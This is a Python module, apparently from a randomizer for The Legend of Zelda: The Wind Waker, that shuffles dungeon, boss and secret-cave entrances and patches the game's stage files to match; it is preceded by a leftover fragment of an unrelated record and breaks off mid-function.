'./word2vec_model/advertiserid_w2v_128.txt')\n","sub_path":"LGB_Frame/get_feature/get_feature_w2v_advertiserid.py","file_name":"get_feature_w2v_advertiserid.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312157763","text":"from dataclasses import dataclass\n\nfrom wwlib.dzx import DZx, _2DMA, ACTR, PLYR, SCLS\nfrom wwlib.events import EventList\n\n@dataclass(frozen=True)\nclass ZoneEntrance:\n stage_name: str\n room_num: int\n scls_exit_index: int\n spawn_id: int\n entrance_name: str\n island_name: str = None\n warp_out_stage_name: str = None\n warp_out_room_num: int = None\n warp_out_spawn_id: int = None\n \n @property\n def is_nested(self):\n return self.island_name is None\n\nDUNGEON_ENTRANCES = [\n ZoneEntrance(\"Adanmae\", 0, 2, 2, \"Dungeon Entrance on Dragon Roost Island\", \"Dragon Roost Island\", \"sea\", 13, 211),\n ZoneEntrance(\"sea\", 41, 6, 6, \"Dungeon Entrance in Forest Haven Sector\", \"Forest Haven\", \"Omori\", 0, 215),\n ZoneEntrance(\"sea\", 26, 0, 2, \"Dungeon Entrance in Tower of the Gods Sector\", \"Tower of the Gods\", \"sea\", 26, 1),\n ZoneEntrance(\"Edaichi\", 0, 0, 1, \"Dungeon Entrance on Headstone Island\", \"Headstone Island\", \"sea\", 45, 229),\n ZoneEntrance(\"Ekaze\", 0, 0, 1, \"Dungeon Entrance on Gale Isle\", \"Gale Isle\", \"sea\", 4, 232),\n]\nBOSS_ENTRANCES = [\n ZoneEntrance(\"M_NewD2\", 10, 1, 27, \"Boss Entrance in Dragon Roost Cavern\"),\n ZoneEntrance(\"kindan\", 16, 0, 1, \"Boss Entrance in Forbidden Woods\"),\n ZoneEntrance(\"Siren\", 18, 0, 27, \"Boss Entrance in Tower of the Gods\"),\n ZoneEntrance(\"M_Dai\", 15, 0, 27, \"Boss Entrance in Earth Temple\"),\n ZoneEntrance(\"kaze\", 12, 0, 27, \"Boss Entrance in Wind Temple\"),\n]\nSECRET_CAVE_ENTRANCES = [\n ZoneEntrance(\"sea\", 44, 8, 10, \"Secret Cave Entrance on Outset Island\", \"Outset Island\", \"sea\", 44, 10),\n ZoneEntrance(\"sea\", 13, 2, 5, \"Secret Cave Entrance on Dragon Roost Island\", \"Dragon Roost Island\", \"sea\", 13, 5),\n # Note: For Fire Mountain and Ice Ring Isle, the spawn ID specified is on the sea with KoRL instead of being at the cave entrance, since the player would get burnt/frozen if they were put at the entrance while the island is still active.\n ZoneEntrance(\"sea\", 20, 0, 0, \"Secret Cave Entrance on Fire Mountain\", \"Fire Mountain\", \"sea\", 20, 0),\n ZoneEntrance(\"sea\", 40, 0, 0, \"Secret Cave Entrance on Ice Ring Isle\", \"Ice Ring Isle\", \"sea\", 40, 0),\n ZoneEntrance(\"Abesso\", 0, 1, 1, \"Secret Cave Entrance on Private Oasis\", \"Private Oasis\", \"Abesso\", 0, 1),\n ZoneEntrance(\"sea\", 29, 0, 5, \"Secret Cave Entrance on Needle Rock Isle\", \"Needle Rock Isle\", \"sea\", 29, 5),\n ZoneEntrance(\"sea\", 47, 1, 5, \"Secret Cave Entrance on Angular Isles\", \"Angular Isles\", \"sea\", 47, 5),\n ZoneEntrance(\"sea\", 48, 0, 5, \"Secret Cave Entrance on Boating Course\", \"Boating Course\", \"sea\", 48, 5),\n ZoneEntrance(\"sea\", 31, 0, 1, \"Secret Cave Entrance on Stone Watcher Island\", \"Stone Watcher Island\", \"sea\", 31, 1),\n ZoneEntrance(\"sea\", 7, 0, 1, \"Secret Cave Entrance on Overlook Island\", \"Overlook Island\", \"sea\", 7, 1),\n ZoneEntrance(\"sea\", 35, 0, 1, \"Secret Cave Entrance on Bird's Peak Rock\", \"Bird's Peak Rock\", \"sea\", 35, 1),\n ZoneEntrance(\"sea\", 12, 0, 1, \"Secret Cave Entrance on Pawprint Isle\", \"Pawprint Isle\", \"sea\", 12, 1),\n ZoneEntrance(\"sea\", 12, 1, 5, \"Secret Cave Entrance on Pawprint Isle 
Side Isle\", \"Pawprint Isle\", \"sea\", 12, 5),\n ZoneEntrance(\"sea\", 36, 0, 1, \"Secret Cave Entrance on Diamond Steppe Island\", \"Diamond Steppe Island\", \"sea\", 36, 1),\n ZoneEntrance(\"sea\", 34, 0, 1, \"Secret Cave Entrance on Bomb Island\", \"Bomb Island\", \"sea\", 34, 1),\n ZoneEntrance(\"sea\", 16, 0, 1, \"Secret Cave Entrance on Rock Spire Isle\", \"Rock Spire Isle\", \"sea\", 16, 1),\n ZoneEntrance(\"sea\", 38, 0, 5, \"Secret Cave Entrance on Shark Island\", \"Shark Island\", \"sea\", 38, 5),\n ZoneEntrance(\"sea\", 42, 0, 2, \"Secret Cave Entrance on Cliff Plateau Isles\", \"Cliff Plateau Isles\", \"sea\", 42, 2),\n ZoneEntrance(\"sea\", 43, 0, 5, \"Secret Cave Entrance on Horseshoe Island\", \"Horseshoe Island\", \"sea\", 43, 5),\n ZoneEntrance(\"sea\", 2, 0, 1, \"Secret Cave Entrance on Star Island\", \"Star Island\", \"sea\", 2, 1),\n]\nALL_ENTRANCES = \\\n DUNGEON_ENTRANCES + \\\n BOSS_ENTRANCES + \\\n SECRET_CAVE_ENTRANCES\n\n@dataclass(frozen=True)\nclass ZoneExit:\n stage_name: str\n room_num: int\n scls_exit_index: int\n spawn_id: int\n zone_name: str\n unique_name: str\n boss_stage_name: str = None\n\nDUNGEON_EXITS = [\n ZoneExit(\"M_NewD2\", 0, 0, 0, \"Dragon Roost Cavern\", \"Dragon Roost Cavern\", \"M_DragB\"),\n ZoneExit(\"kindan\", 0, 0, 0, \"Forbidden Woods\", \"Forbidden Woods\", \"kinBOSS\"),\n ZoneExit(\"Siren\", 0, 1, 0, \"Tower of the Gods\", \"Tower of the Gods\", \"SirenB\"),\n ZoneExit(\"M_Dai\", 0, 0, 0, \"Earth Temple\", \"Earth Temple\", \"M_DaiB\"),\n ZoneExit(\"kaze\", 15, 0, 15, \"Wind Temple\", \"Wind Temple\", \"kazeB\"),\n]\nBOSS_EXITS = [\n ZoneExit(\"M_DragB\", 0, 0, 0, \"Gohma Boss Arena\", \"Gohma Boss Arena\"),\n ZoneExit(\"kinBOSS\", 0, 0, 0, \"Kalle Demos Boss Arena\", \"Kalle Demos Boss Arena\"),\n ZoneExit(\"SirenB\", 0, 0, 0, \"Gohdan Boss Arena\", \"Gohdan Boss Arena\"),\n ZoneExit(\"M_DaiB\", 0, 0, 0, \"Jalhalla Boss Arena\", \"Jalhalla Boss Arena\"),\n ZoneExit(\"kazeB\", 0, 0, 0, \"Molgera Boss Arena\", \"Molgera Boss Arena\"),\n]\nSECRET_CAVE_EXITS = [\n ZoneExit(\"Cave09\", 0, 1, 0, \"Outset Island\", \"Savage Labyrinth\"),\n ZoneExit(\"TF_06\", 0, 0, 0, \"Dragon Roost Island\", \"Dragon Roost Island Secret Cave\"),\n ZoneExit(\"MiniKaz\", 0, 0, 0, \"Fire Mountain\", \"Fire Mountain Secret Cave\"),\n ZoneExit(\"MiniHyo\", 0, 0, 0, \"Ice Ring Isle\", \"Ice Ring Isle Secret Cave\"),\n ZoneExit(\"TF_04\", 0, 0, 0, \"Private Oasis\", \"Cabana Labyrinth\"),\n ZoneExit(\"SubD42\", 0, 0, 0, \"Needle Rock Isle\", \"Needle Rock Isle Secret Cave\"),\n ZoneExit(\"SubD43\", 0, 0, 0, \"Angular Isles\", \"Angular Isles Secret Cave\"),\n ZoneExit(\"SubD71\", 0, 0, 0, \"Boating Course\", \"Boating Course Secret Cave\"),\n ZoneExit(\"TF_01\", 0, 0, 0, \"Stone Watcher Island\", \"Stone Watcher Island Secret Cave\"),\n ZoneExit(\"TF_02\", 0, 0, 0, \"Overlook Island\", \"Overlook Island Secret Cave\"),\n ZoneExit(\"TF_03\", 0, 0, 0, \"Bird's Peak Rock\", \"Bird's Peak Rock Secret Cave\"),\n ZoneExit(\"TyuTyu\", 0, 0, 0, \"Pawprint Isle\", \"Pawprint Isle Chuchu Cave\"),\n ZoneExit(\"Cave07\", 0, 0, 0, \"Pawprint Isle Side Isle\", \"Pawprint Isle Wizzrobe Cave\"),\n ZoneExit(\"WarpD\", 0, 0, 0, \"Diamond Steppe Island\", \"Diamond Steppe Island Warp Maze Cave\"),\n ZoneExit(\"Cave01\", 0, 0, 0, \"Bomb Island\", \"Bomb Island Secret Cave\"),\n ZoneExit(\"Cave04\", 0, 0, 0, \"Rock Spire Isle\", \"Rock Spire Isle Secret Cave\"),\n ZoneExit(\"ITest63\", 0, 0, 0, \"Shark Island\", \"Shark Island Secret Cave\"),\n ZoneExit(\"Cave03\", 0, 0, 0, \"Cliff 
Plateau Isles\", \"Cliff Plateau Isles Secret Cave\"),\n ZoneExit(\"Cave05\", 0, 0, 0, \"Horseshoe Island\", \"Horseshoe Island Secret Cave\"),\n ZoneExit(\"Cave02\", 0, 0, 0, \"Star Island\", \"Star Island Secret Cave\"),\n]\nALL_EXITS = \\\n DUNGEON_EXITS + \\\n BOSS_EXITS + \\\n SECRET_CAVE_EXITS\n\nDUNGEON_ENTRANCE_NAMES_WITH_NO_REQUIREMENTS = [\n \"Dungeon Entrance on Dragon Roost Island\",\n]\nSECRET_CAVE_ENTRANCE_NAMES_WITH_NO_REQUIREMENTS = [\n \"Secret Cave Entrance on Pawprint Isle\",\n \"Secret Cave Entrance on Cliff Plateau Isles\",\n]\n\nDUNGEON_EXIT_NAMES_WITH_NO_REQUIREMENTS = [\n \"Dragon Roost Cavern\",\n]\nPUZZLE_SECRET_CAVE_EXIT_NAMES_WITH_NO_REQUIREMENTS = [\n \"Pawprint Isle Chuchu Cave\",\n \"Ice Ring Isle Secret Cave\",\n \"Bird's Peak Rock Secret Cave\", # Technically this has requirements, but it's just Wind Waker+Wind's Requiem.\n \"Diamond Steppe Island Warp Maze Cave\",\n]\nCOMBAT_SECRET_CAVE_EXIT_NAMES_WITH_NO_REQUIREMENTS = [\n \"Rock Spire Isle Secret Cave\",\n]\n\nITEM_LOCATION_NAME_TO_EXIT_ZONE_NAME_OVERRIDES = {\n \"Pawprint Isle - Wizzrobe Cave\": \"Pawprint Isle Side Isle\",\n \"Dragon Roost Cavern - Gohma Heart Container\": \"Gohma Boss Arena\",\n \"Forbidden Woods - Kalle Demos Heart Container\": \"Kalle Demos Boss Arena\",\n \"Tower of the Gods - Gohdan Heart Container\": \"Gohdan Boss Arena\",\n \"Earth Temple - Jalhalla Heart Container\": \"Jalhalla Boss Arena\",\n \"Wind Temple - Molgera Heart Container\": \"Molgera Boss Arena\",\n}\n\n# TODO: Maybe make a separate list of entrances and exits that have no requirements when you start with a sword. (e.g. Cliff Plateau Isles Secret Cave.) Probably not necessary though.\n\ndef randomize_entrances(self):\n if self.options.get(\"randomize_entrances\") == \"Dungeons\":\n randomize_one_set_of_entrances(self, include_dungeons=True)\n elif self.options.get(\"randomize_entrances\") == \"Nested Dungeons\":\n randomize_one_set_of_entrances(self, include_dungeons=True, include_bosses=True)\n elif self.options.get(\"randomize_entrances\") == \"Secret Caves\":\n randomize_one_set_of_entrances(self, include_caves=True)\n elif self.options.get(\"randomize_entrances\") == \"Dungeons & Secret Caves (Separately)\":\n randomize_one_set_of_entrances(self, include_dungeons=True)\n randomize_one_set_of_entrances(self, include_caves=True)\n elif self.options.get(\"randomize_entrances\") == \"Nested Dungeons & Secret Caves (Separately)\":\n randomize_one_set_of_entrances(self, include_dungeons=True, include_bosses=True)\n randomize_one_set_of_entrances(self, include_caves=True)\n elif self.options.get(\"randomize_entrances\") == \"Dungeons & Secret Caves (Together)\":\n randomize_one_set_of_entrances(self, include_dungeons=True, include_caves=True)\n elif self.options.get(\"randomize_entrances\") == \"Nested Dungeons & Secret Caves (Together)\":\n randomize_one_set_of_entrances(self, include_dungeons=True, include_bosses=True, include_caves=True)\n else:\n raise Exception(\"Invalid entrance randomizer option: %s\" % self.options.get(\"randomize_entrances\"))\n\ndef randomize_one_set_of_entrances(self, include_dungeons=False, include_bosses=False, include_caves=False):\n relevant_entrances: list[ZoneEntrance] = []\n relevant_exits: list[ZoneExit] = []\n if include_dungeons:\n relevant_entrances += DUNGEON_ENTRANCES\n relevant_exits += DUNGEON_EXITS\n if include_bosses:\n relevant_entrances += BOSS_ENTRANCES\n relevant_exits += BOSS_EXITS\n if include_caves:\n relevant_entrances += SECRET_CAVE_ENTRANCES\n relevant_exits += 
SECRET_CAVE_EXITS\n \n remaining_exits = relevant_exits.copy()\n self.rng.shuffle(relevant_entrances)\n \n doing_progress_entrances_for_dungeons_and_caves_only_start = False\n if self.dungeons_and_caves_only_start:\n if include_dungeons and self.options.get(\"progression_dungeons\"):\n doing_progress_entrances_for_dungeons_and_caves_only_start = True\n if include_caves and (self.options.get(\"progression_puzzle_secret_caves\") \\\n or self.options.get(\"progression_combat_secret_caves\") \\\n or self.options.get(\"progression_savage_labyrinth\")):\n doing_progress_entrances_for_dungeons_and_caves_only_start = True\n \n if self.options.get(\"race_mode\"):\n # Move entrances that are on islands with multiple entrances to the start of the list.\n # This is because we need to prevent these islands from having multiple dungeons on them in Race Mode, and this can fail if they're not at the start of the list because it's possible for the only possibility left to be to put multiple dungeons on one island.\n entrances_not_on_unique_islands = []\n for zone_entrance in relevant_entrances:\n for other_zone_entrance in relevant_entrances:\n if other_zone_entrance.island_name == zone_entrance.island_name and other_zone_entrance != zone_entrance:\n entrances_not_on_unique_islands.append(zone_entrance)\n break\n for zone_entrance in entrances_not_on_unique_islands:\n relevant_entrances.remove(zone_entrance)\n relevant_entrances = entrances_not_on_unique_islands + relevant_entrances\n \n if doing_progress_entrances_for_dungeons_and_caves_only_start:\n # If the player can't access any locations at the start besides dungeon/cave entrances, we choose an entrance with no requirements that will be the first place the player goes.\n # We will make this entrance lead to a dungeon/cave with no requirements so the player can actually get an item at the start.\n \n entrance_names_with_no_requirements = []\n if self.options.get(\"progression_dungeons\"):\n entrance_names_with_no_requirements += DUNGEON_ENTRANCE_NAMES_WITH_NO_REQUIREMENTS\n if self.options.get(\"progression_puzzle_secret_caves\") \\\n or self.options.get(\"progression_combat_secret_caves\") \\\n or self.options.get(\"progression_savage_labyrinth\"):\n entrance_names_with_no_requirements += SECRET_CAVE_ENTRANCE_NAMES_WITH_NO_REQUIREMENTS\n \n exit_names_with_no_requirements = []\n if self.options.get(\"progression_dungeons\"):\n exit_names_with_no_requirements += DUNGEON_EXIT_NAMES_WITH_NO_REQUIREMENTS\n if self.options.get(\"progression_puzzle_secret_caves\"):\n exit_names_with_no_requirements += PUZZLE_SECRET_CAVE_EXIT_NAMES_WITH_NO_REQUIREMENTS\n if self.options.get(\"progression_combat_secret_caves\"):\n exit_names_with_no_requirements += COMBAT_SECRET_CAVE_EXIT_NAMES_WITH_NO_REQUIREMENTS\n # No need to check progression_savage_labyrinth, since neither of the items inside Savage have no requirements.\n \n possible_safety_entrances = [\n e for e in relevant_entrances\n if e.entrance_name in entrance_names_with_no_requirements\n ]\n safety_entrance = self.rng.choice(possible_safety_entrances)\n \n # In order to avoid using up all dungeons/caves with no requirements, we have to do this entrance first, so move it to the start of the array.\n relevant_entrances.remove(safety_entrance)\n relevant_entrances.insert(0, safety_entrance)\n \n done_entrances_to_exits: dict[ZoneEntrance, ZoneExit] = {}\n done_exits_to_entrances: dict[ZoneExit, ZoneEntrance] = {}\n while relevant_entrances:\n zone_entrance = relevant_entrances.pop(0)\n outermost_entrance = 
get_outermost_entrance_for_entrance(zone_entrance, done_exits_to_entrances)\n if outermost_entrance is None:\n # Boss entrance that isn't yet accessible from the sea in any way.\n # We don't want to connect this to anything yet or we risk creating an infinite loop.\n # So postpone it until the end.\n relevant_entrances.append(zone_entrance)\n continue\n \n if doing_progress_entrances_for_dungeons_and_caves_only_start and zone_entrance == safety_entrance:\n possible_remaining_exits = [e for e in remaining_exits if e.unique_name in exit_names_with_no_requirements]\n else:\n possible_remaining_exits = remaining_exits\n \n if any(e for e in possible_remaining_exits if e in DUNGEON_EXITS):\n # Only start placing boss exits after all dungeon exits have been placed.\n possible_remaining_exits = [e for e in remaining_exits if e not in BOSS_EXITS]\n \n # The below is debugging code for testing the caves with timers.\n #if zone_entrance.entrance_name == \"Secret Cave Entrance on Fire Mountain\":\n # possible_remaining_exits = [\n # x for x in remaining_exits\n # if x.unique_name == \"Ice Ring Isle Secret Cave\"\n # ]\n #elif zone_entrance.entrance_name == \"Secret Cave Entrance on Ice Ring Isle\":\n # possible_remaining_exits = [\n # x for x in remaining_exits\n # if x.unique_name == \"Fire Mountain Secret Cave\"\n # ]\n #else:\n # possible_remaining_exits = [\n # x for x in remaining_exits\n # if x.unique_name not in [\"Fire Mountain Secret Cave\", \"Ice Ring Isle Secret Cave\"]\n # ]\n \n if self.options.get(\"race_mode\"):\n # Prevent two entrances on the same island both leading into dungeons (DRC and Pawprint each have two entrances).\n # This is because Race Mode's dungeon markers only tell you what island required dungeons are on, not which of the two entrances it's in. 
So if a required dungeon and a non-required dungeon were on the same island there would be no way to tell which is required.\n done_entrances_on_same_island_leading_to_a_dungeon = [\n entr for entr in done_entrances_to_exits\n if entr.island_name == zone_entrance.island_name\n and done_entrances_to_exits[entr] in DUNGEON_EXITS\n ]\n if done_entrances_on_same_island_leading_to_a_dungeon:\n possible_remaining_exits = [\n ex for ex in possible_remaining_exits\n if ex not in DUNGEON_EXITS + BOSS_EXITS\n ]\n \n if not possible_remaining_exits:\n raise Exception(f\"No valid exits to place for entrance: {zone_entrance.entrance_name}\")\n zone_exit = self.rng.choice(possible_remaining_exits)\n remaining_exits.remove(zone_exit)\n \n self.entrance_connections[zone_entrance.entrance_name] = zone_exit.unique_name\n done_entrances_to_exits[zone_entrance] = zone_exit\n done_exits_to_entrances[zone_exit] = zone_entrance\n \n self.logic.update_entrance_connection_macros()\n \n for zone_exit, zone_entrance in done_exits_to_entrances.items():\n outermost_entrance = get_outermost_entrance_for_exit(zone_exit, done_exits_to_entrances)\n \n self.dungeon_and_cave_island_locations[zone_exit.zone_name] = outermost_entrance.island_name\n \n if not self.dry_run:\n update_entrance_to_lead_to_exit(self, zone_entrance, zone_exit, outermost_entrance)\n \n if include_bosses:\n for boss_exit in BOSS_EXITS:\n if not self.dry_run:\n outermost_entrance = get_outermost_entrance_for_exit(boss_exit, done_exits_to_entrances)\n update_boss_warp_out_destination(self, boss_exit.stage_name, outermost_entrance)\n elif include_dungeons:\n for dungeon_exit in DUNGEON_EXITS:\n outermost_entrance = done_exits_to_entrances[dungeon_exit]\n \n if not self.dry_run:\n update_boss_warp_out_destination(self, dungeon_exit.boss_stage_name, outermost_entrance)\n \n # Update the boss exit's island even when nested dungeon randomization is disabled.\n boss_exit = next(\n zone_exit for zone_exit in BOSS_EXITS\n if zone_exit.stage_name == dungeon_exit.boss_stage_name\n )\n self.dungeon_and_cave_island_locations[boss_exit.zone_name] = outermost_entrance.island_name\n \n # Prepare some data so the spoiler log can display the nesting in terms of paths.\n if include_bosses:\n self.nested_entrance_paths = []\n terminal_exits = [ex for ex in relevant_exits if ex not in DUNGEON_EXITS]\n for terminal_exit in terminal_exits:\n zone_entrance = done_exits_to_entrances[terminal_exit]\n seen_entrances = get_all_entrances_on_path_to_entrance(zone_entrance, done_exits_to_entrances)\n path = [terminal_exit.unique_name]\n for entr in seen_entrances:\n path.append(entr.entrance_name)\n path.reverse()\n self.nested_entrance_paths.append(path)\n\ndef get_outermost_entrance_for_exit(zone_exit: ZoneExit, done_exits_to_entrances):\n \"\"\" Unrecurses nested dungeons to determine what the outermost (island) entrance is for a given exit.\"\"\"\n zone_entrance = done_exits_to_entrances[zone_exit]\n return get_outermost_entrance_for_entrance(zone_entrance, done_exits_to_entrances)\n\ndef get_outermost_entrance_for_entrance(zone_entrance: ZoneEntrance, done_exits_to_entrances):\n \"\"\" Unrecurses nested dungeons to determine what the outermost (island) entrance is for a given entrance.\"\"\"\n seen_entrances = get_all_entrances_on_path_to_entrance(zone_entrance, done_exits_to_entrances)\n if seen_entrances is None:\n return None\n outermost_entrance = seen_entrances[-1]\n return outermost_entrance\n\ndef get_all_entrances_on_path_to_entrance(zone_entrance: ZoneEntrance, 
done_exits_to_entrances):\n \"\"\" Unrecurses nested dungeons to build a list of all entrances leading to a given entrance.\"\"\"\n seen_entrances = []\n while zone_entrance.is_nested:\n if zone_entrance in seen_entrances:\n raise Exception(\"Entrances are in an infinite loop: %s\" % \", \".join([e.entrance_name for e in seen_entrances]))\n seen_entrances.append(zone_entrance)\n dungeon_start_exit = get_dungeon_start_exit_leading_to_nested_entrance(zone_entrance)\n if dungeon_start_exit not in done_exits_to_entrances:\n return None\n zone_entrance = done_exits_to_entrances[dungeon_start_exit]\n seen_entrances.append(zone_entrance)\n return seen_entrances\n\ndef get_dungeon_start_exit_leading_to_nested_entrance(zone_entrance: ZoneEntrance):\n assert zone_entrance.entrance_name.startswith(\"Boss Entrance in \")\n dungeon_name = zone_entrance.entrance_name[len(\"Boss Entrance in \"):]\n dungeon_start_exit = next(ex for ex in DUNGEON_EXITS if ex.unique_name == dungeon_name)\n return dungeon_start_exit\n\ndef update_entrance_to_lead_to_exit(self, zone_entrance: ZoneEntrance, zone_exit: ZoneExit, outermost_entrance: ZoneEntrance):\n # Update the stage this entrance takes you into.\n entrance_dzr_path = \"files/res/Stage/%s/Room%d.arc\" % (zone_entrance.stage_name, zone_entrance.room_num)\n entrance_dzs_path = \"files/res/Stage/%s/Stage.arc\" % (zone_entrance.stage_name)\n entrance_dzr = self.get_arc(entrance_dzr_path).get_file(\"room.dzr\", DZx)\n entrance_dzs = self.get_arc(entrance_dzs_path).get_file(\"stage.dzs\", DZx)\n entrance_scls = entrance_dzr.entries_by_type(SCLS)[zone_entrance.scls_exit_index]\n entrance_scls.dest_stage_name = zone_exit.stage_name\n entrance_scls.room_index = zone_exit.room_num\n entrance_scls.spawn_id = zone_exit.spawn_id\n entrance_scls.save_changes()\n \n exit_dzr_path = \"files/res/Stage/%s/Room%d.arc\" % (zone_exit.stage_name, zone_exit.room_num)\n exit_dzs_path = \"files/res/Stage/%s/Stage.arc\" % zone_exit.stage_name\n \n # Update the DRI spawn to not have spawn type 5.\n # If the DRI entrance was connected to the TotG dungeon, then exiting TotG while riding KoRL would crash the game.\n if len(entrance_dzs.entries_by_type(PLYR)) > 0:\n entrance_spawns = entrance_dzs.entries_by_type(PLYR)\n else:\n entrance_spawns = entrance_dzr.entries_by_type(PLYR)\n entrance_spawn = next(spawn for spawn in entrance_spawns if spawn.spawn_id == zone_entrance.spawn_id)\n if entrance_spawn.spawn_type == 5:\n entrance_spawn.spawn_type = 1\n entrance_spawn.save_changes()\n \n if zone_exit in BOSS_EXITS:\n # Update the spawn you're placed at when saving and reloading inside a boss room.\n exit_dzs = self.get_arc(exit_dzs_path).get_file(\"stage.dzs\", DZx)\n exit_scls = exit_dzs.entries_by_type(SCLS)[zone_exit.scls_exit_index]\n if zone_entrance in BOSS_ENTRANCES:\n # If the end of a dungeon connects to a boss, saving and reloading inside the boss\n # room should put you at the beginning of that dungeon, not the end.\n # But if multiple dungeons are nested we don't take the player all the way back to the\n # beginning of the chain, just to the beginning of the last dungeon.\n dungeon_start_exit = entrance_dzs.entries_by_type(SCLS)[0]\n exit_scls.dest_stage_name = dungeon_start_exit.dest_stage_name\n exit_scls.room_index = dungeon_start_exit.room_index\n exit_scls.spawn_id = dungeon_start_exit.spawn_id\n exit_scls.save_changes()\n else:\n # If a sea entrance connects directly to a boss we put you right outside that entrance.\n exit_scls.dest_stage_name = zone_entrance.stage_name\n 
exit_scls.room_index = zone_entrance.room_num\n exit_scls.spawn_id = zone_entrance.spawn_id\n exit_scls.save_changes()\n else:\n # Update the entrance you're put at when leaving the dungeon/secret cave.\n exit_dzr = self.get_arc(exit_dzr_path).get_file(\"room.dzr\", DZx)\n exit_scls = exit_dzr.entries_by_type(SCLS)[zone_exit.scls_exit_index]\n exit_scls.dest_stage_name = zone_entrance.stage_name\n exit_scls.room_index = zone_entrance.room_num\n exit_scls.spawn_id = zone_entrance.spawn_id\n exit_scls.save_changes()\n \n # Also update the extra exits when leaving Savage Labyrinth to put you on the correct entrance when leaving.\n if zone_exit.unique_name == \"Savage Labyrinth\":\n for stage_and_room_name in [\"Cave10/Room0\", \"Cave10/Room20\", \"Cave11/Room0\"]:\n savage_dzr_path = \"files/res/Stage/%s.arc\" % stage_and_room_name\n savage_dzr = self.get_arc(savage_dzr_path).get_file(\"room.dzr\", DZx)\n exit_sclses = [x for x in savage_dzr.entries_by_type(SCLS) if x.dest_stage_name == \"sea\"]\n for exit_scls in exit_sclses:\n exit_scls.dest_stage_name = zone_entrance.stage_name\n exit_scls.room_index = zone_entrance.room_num\n exit_scls.spawn_id = zone_entrance.spawn_id\n exit_scls.save_changes()\n \n if zone_exit in SECRET_CAVE_EXITS:\n # Update the sector coordinates in the 2DMA chunk so that save-and-quitting in a secret cave puts you on the correct island.\n exit_dzs = self.get_arc(exit_dzs_path).get_file(\"stage.dzs\", DZx)\n _2dma = exit_dzs.entries_by_type(_2DMA)[0]\n island_number = self.island_name_to_number[outermost_entrance.island_name]\n sector_x = (island_number-1) % 7\n sector_y = (island_number-1) // 7\n _2dma.sector_x = sector_x-3\n _2dma.sector_y = sector_y-3\n _2dma.save_changes()\n \n if zone_exit.unique_name == \"Fire Mountain Secret Cave\":\n actors = exit_dzr.entries_by_type(ACTR)\n kill_trigger = next(x for x in actors if x.name == \"VolTag\")\n if zone_entrance.entrance_name == \"Secret Cave Entrance on Fire Mountain\":\n # Unchanged from vanilla, do nothing.\n pass\n elif zone_entrance.entrance_name == \"Secret Cave Entrance on Ice Ring Isle\":\n # Ice Ring's entrance leads to Fire Mountain's exit.\n # Change the kill trigger on the inside of Fire Mountain to act like the one inside Ice Ring.\n kill_trigger.type = 2\n kill_trigger.save_changes()\n else:\n # An entrance without a timer leads into this cave.\n # Remove the kill trigger actor on the inside, because otherwise it would throw the player out the instant they enter.\n exit_dzr.remove_entity(kill_trigger, ACTR)\n \n if zone_exit.unique_name == \"Ice Ring Isle Secret Cave\":\n actors = exit_dzr.entries_by_type(ACTR)\n kill_trigger = next(x for x in actors if x.name == \"VolTag\")\n if zone_entrance.entrance_name == \"Secret Cave Entrance on Ice Ring Isle\":\n # Unchanged from vanilla, do nothing.\n pass\n elif zone_entrance.entrance_name == \"Secret Cave Entrance on Fire Mountain\":\n # Fire Mountain's entrance leads to Ice Ring's exit.\n # Change the kill trigger on the inside of Ice Ring to act like the one inside Fire Mountain.\n kill_trigger.type = 1\n kill_trigger.save_changes()\n else:\n # An entrance without a timer leads into this cave.\n # Remove the kill trigger actor on the inside, because otherwise it would throw the player out the instant they enter.\n exit_dzr.remove_entity(kill_trigger, ACTR)\n \n if zone_exit.unique_name == \"Ice Ring Isle Secret Cave\":\n # Also update the inner cave of Ice Ring Isle to take you out to the correct entrance as well.\n inner_cave_dzr_path = 
\"files/res/Stage/ITest62/Room0.arc\"\n inner_cave_dzr = self.get_arc(inner_cave_dzr_path).get_file(\"room.dzr\", DZx)\n inner_cave_exit_scls = inner_cave_dzr.entries_by_type(SCLS)[0]\n inner_cave_exit_scls.dest_stage_name = zone_entrance.stage_name\n inner_cave_exit_scls.room_index = zone_entrance.room_num\n inner_cave_exit_scls.spawn_id = zone_entrance.spawn_id\n inner_cave_exit_scls.save_changes()\n \n # Also update the sector coordinates in the 2DMA chunk of the inner cave of Ice Ring Isle so save-and-quitting works properly there.\n inner_cave_dzs_path = \"files/res/Stage/ITest62/Stage.arc\"\n inner_cave_dzs = self.get_arc(inner_cave_dzs_path).get_file(\"stage.dzs\", DZx)\n inner_cave_2dma = inner_cave_dzs.entries_by_type(_2DMA)[0]\n inner_cave_2dma.sector_x = sector_x-3\n inner_cave_2dma.sector_y = sector_y-3\n inner_cave_2dma.save_changes()\n\ndef update_boss_warp_out_destination(self, boss_stage_name, outermost_entrance):\n # Update the wind warp out event to take you to the correct island.\n boss_stage_arc_path = \"files/res/Stage/%s/Stage.arc\" % boss_stage_name\n event_list = self.get_arc(boss_stage_arc_path).get_file(\"event_list.dat\", EventList)\n warp_out_event = event_list.events_by_name[\"WARP_WIND_AFTER\"]\n director = next(actor for actor in warp_out_event.actors if actor.name == \"DIRECTOR\")\n stage_change_action = next(action for action in director.actions if action.name == \"NEXT\")\n stage_name_prop = next(prop for prop in stage_change_action.properties if prop.name == \"Stage\")\n stage_name_prop.value = outermost_entrance.warp_out_stage_name\n room_num_prop = next(prop for prop in stage_change_action.properties if prop.name == \"RoomNo\")\n room_num_prop.value = outermost_entrance.warp_out_room_num\n spawn_id_prop = next(prop for prop in stage_change_action.properties if prop.name == \"StartCode\")\n spawn_id_prop.value = outermost_entrance.warp_out_spawn_id\n\ndef get_entrance_zone_for_item_location(self, location_name):\n # Helper function to return the entrance zone name for the location.\n #\n # For non-dungeon and non-cave locations, the entrance zone name is simply the zone (island) name. 
However, when\n    # entrances are randomized, the entrance zone name may differ from the zone name for dungeons and caves.\n    # As a special case, if the entrance zone is Tower of the Gods or the location name is \"Tower of the Gods - Sunken\n    # Treasure\", the entrance zone name is \"Tower of the Gods Sector\" to differentiate between the dungeon and the\n    # entrance.\n    \n    zone_name, specific_location_name = self.logic.split_location_name_by_zone(location_name)\n    \n    if location_name in ITEM_LOCATION_NAME_TO_EXIT_ZONE_NAME_OVERRIDES:\n        zone_name = ITEM_LOCATION_NAME_TO_EXIT_ZONE_NAME_OVERRIDES[location_name]\n    \n    if zone_name in self.dungeon_and_cave_island_locations and self.logic.is_dungeon_or_cave(location_name):\n        # If the location is in a dungeon or cave, use the hint for whatever island the dungeon/cave is located on.\n        entrance_zone = 